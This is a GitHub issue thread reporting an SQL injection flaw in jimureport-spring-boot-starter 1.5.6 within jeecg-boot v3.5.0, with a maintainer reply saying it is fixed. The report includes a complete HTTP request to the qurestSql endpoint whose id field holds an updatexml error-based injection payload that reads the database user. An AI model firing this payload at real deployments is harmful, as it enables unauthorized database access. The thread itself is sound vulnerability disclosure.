### ISSUE TITLE
jimureport-spring-boot-starter-1.5.6  sql注入漏洞

### ISSUE THREAD

**Issue by k3sc** [jeecgboot/jeecg-boot#4734]
##### 版本号：
v3.5.0

##### 前端版本：vue3版？还是 vue2版？

vue3
##### 问题描述：
SQL注入漏洞

##### 截图&代码：
![image](https://user-images.githubusercontent.com/28189393/226602341-febb440f-941a-4c53-a804-a6e0b828d458.png)
![image](https://user-images.githubusercontent.com/28189393/226602363-8461fd23-6a12-4050-8d10-a03fa5af017a.png)
![image](https://user-images.githubusercontent.com/28189393/226602386-14b6bf3e-97ba-4951-bec6-e58a13210081.png)
![image](https://user-images.githubusercontent.com/28189393/226602427-aa8da6d8-f498-406a-989e-a6f44855612d.png)
![image](https://user-images.githubusercontent.com/28189393/226602447-c895ae89-680c-4da1-9a9f-3f7b149e7551.png)

PayLoad
`POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: localhost:8080
Cache-Control: max-age=0
sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close
Content-Length: 130
Content-Type: application/json;charset=UTF-8

{"apiSelectId":"1290104038414721025",
"id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}`

**Comment by 1298191366** [comment]
已修复，待新版本发布

**Comment by defaul0t** [comment]
作者你好，我下载了3.5版本，但我没有找到 @PostMapping("/qurestSql")
